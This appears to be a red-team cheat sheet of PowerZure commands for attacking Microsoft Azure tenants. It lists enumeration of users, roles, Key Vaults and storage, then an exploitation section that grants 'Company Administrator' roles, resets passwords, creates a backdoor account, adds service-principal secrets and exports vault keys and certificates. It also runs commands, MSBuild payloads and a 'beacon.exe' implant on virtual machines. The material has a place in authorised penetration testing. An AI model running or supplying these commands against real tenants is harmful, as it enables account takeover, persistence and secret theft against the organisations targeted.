PowerZure
Connect:
Connect-AzAccount
Get-AzureTargetEnumeration:
https://powerzure.readthedocs.io/en/latest/Functions/infogathering.html
Auto Enumeration:
Get-AzureADApplication | tee AzureADApplication.txt
Get-AzureADAppOwner | tee AzureADAppOwner.txt
Get-AzureADDeviceOwner | tee AzureADDeviceOwner.txt
Get-AzureADRoleMember -Role 'Global Administrator' | tee AzureADRoleMember-GlobalAdmins.txt
Get-AzureADRoleMember -All | tee AzureADRoleMember-AllRoles.txt
Get-AzureADUser -All | tee AzureADUser-AllUsers.txt
Get-AzureInTuneScript | tee AzureInTuneScript.txt
Get-AzureLogicAppConnector | tee AzureLogicAppConnector.txt
Get-AzureManagedIdentity | tee AzureManagedIdentity.txt
Get-AzurePIMAssignment | tee AzurePIMAssignment.txt
Get-AzureRole -All | tee AzureRole-AllRoles.txt
Get-AzureRunAsAccount | tee AzureRunAsAccount.txt
Get-AzureSQLDB -All | tee AzureSQLDB-All.txt
Show-AzureKeyVaultContent -All | tee AzureKeyVaultContent.txt
Show-AzureStorageContent -All | tee AzureStorageContent.txtTargeted Enumeration:
Get-AzureADGroupMember -Group '[Name of Group]' | tee AzureADGroupMember.txt
Get-AzureADUser -Username [Usename] | tee AzureADUser.txt
Get-AzureRole -Role [ROLE] | tee AzureRole.txt
Get-AzureRolePermission -Permission [role definition] | tee AzureRolePermission.txt
Get-AzureADRoleMember -Role 'Global Administrator' | tee AzureADRoleMember.txt
Show-AzureKeyVaultContent -Name [VaultName] | tee AzureKeyVaultContent.txt
Show-AzureStorageContent -Name [StorageName] | tee AzureStorageContent.txtExploit:
https://powerzure.readthedocs.io/en/latest/Functions/operational.html
Add-AzureADGroupMember -User [UPN] -Group [Group name]
Add-AzureADRole -Username [User Principal Name] -Role '[Role name]'
Add-AzureADRole -UserId [UserId] -RoleId '[Role Id]'
Add-AzureADRole -Username test@test.com -Role 'Company Administrator'
Add-AzureADRole -UserId 6eca6b85-7a3d-4fcf-b8da-c15a4380d286 -Role '4dda258a-4568-4579-abeb-07709e34e307'
Add-AzureADSPSecret -ApplicationName [ApplicationName name] -verbose
New-AzureADUser -Username [User Principal Name]
Set-AzureElevatedPrivileges
Set-AzureADUserPassword -Username [UPN] -Password [new password]
New-AzureBackdoor -Username [Username] -Password [Password]
Connect-AzureJWT -Token [access token] -AccountId [Account's ID]
Export-AzureKeyVaultContent -VaultName [Vault Name] -Type [Key or Certificate] -Name [Name of Key or Cert] -OutFilePath [Full path of where to export]
Get-AzureKeyVaultContent -VaultName [Name of vault]
Get-AzureRunAsCertificate -AutomationAccount [AA Name]
Get-AzureRunbookContent -Runbook [Name of Runbook] -OutFilePath [Path of where to export runbooks]
Get-AzureRunbookContent -All -OutFilePath 'C:\temp
Start-AzureRunbook -Account [Automation Account name] -Runbook [Runbook name]
Invoke-AzureCommandRunbook -AutomationAccount [Automation Account name] -VMName [VM Name] -Command [command]
Invoke-AzureCommandRunbook -AutomationAccount [Automation Account name] -VMName [VM Name] -Script [Path to script]
Get-AzureStorageContent
Get-AzureStorageContent -StorageAccountName TestAcct -Type Container
Get-AzureVMDisk -DiskName [Name of Disk]
Invoke-AzureCommandRunbook -AutomationAccount [Automation Account name] -VMName [VM Name] -Script [Path to script]
Invoke-AzureCustomScriptExtension -VM 'Windows10' -ResourceGroup 'Defaultresourcegroup-cus' -Command 'powershell.exe -c mkdir C:\test'
Invoke-AzureRunCommand -VMName [VM Name] -Command [Command]
Invoke-AzureRunCommand -VMName AzureWin10 -Command whoami
Invoke-AzureRunCommand -VMName AzureWin10 -Script 'C:\temp\test.ps1'
Invoke-AzureRunMSBuild -VMName [Virtual Machine name] -File [C:/path/to/payload/onyourmachine.xml]
Invoke-AzVMRunCommand
Invoke-AzureRunMSBuildd -VMName AzureWin10 -File 'C:\temp\build.xml'
Invoke-AzureRunProgram -VMName [Virtual Machine name] -File [C:/path/to/payload.exe]
Invoke-AzureRunProgram -VMName AzureWin10 -File C:\temp\beacon.exe
Invoke-AzureVMUserDataAgent -VM [Virtual Machine name]
Invoke-AzureVMUserDataCommand -VM [Virtual Machine name] -Command [command]
New-AzureIntuneScript -Script [path/to/script.ps1]
Last updated